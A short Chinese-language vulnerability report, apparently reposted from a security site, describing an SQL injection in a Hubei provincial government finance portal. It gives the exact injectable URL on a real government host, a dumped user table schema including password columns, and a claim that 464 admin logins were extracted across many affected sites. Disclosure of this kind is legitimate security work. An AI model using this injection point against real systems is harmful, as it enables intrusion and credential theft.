湖北省某政务公开网SQL注入漏洞可影响大量下属机构下载
-
来源:黑吧安全网 浏览:562次 时间:2014-07-05
湖北省某政务公开网SQL注入漏洞可影响大量下属机构湖北省财政与编制政务公开网SQL注入影响上百站点,包括湖北省各个县市的财政与编制政务公开网
SQL注入点:
http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?siteID=8a8080820b78cd84010b79331b92001e
Table: CMS_USER_USER
[12 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| USER_A_TEL | VARCHAR2 |
| USER_B_TEL | VARCHAR2 |
| USER_CJSJ | DATE |
| USER_DESCRIPTION | VARCHAR2 |
| USER_EMAIL | VARCHAR2 |
| USER_ID | VARCHAR2 |
| USER_MSN | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PASSWORD | VARCHAR2 |
| USER_QQ | VARCHAR2 |
| USER_XGSJ | DATE |
| USER_XM | VARCHAR2 |
+------------------+----------+
通过此注入点最终获取到后台登录用户464个,影响的站点至少有上百
襄阳财政与编制政务公开网
武汉财政与编制政务公开网
宜昌财政与编制政务公开网
影响的站点:
修复方案:
过滤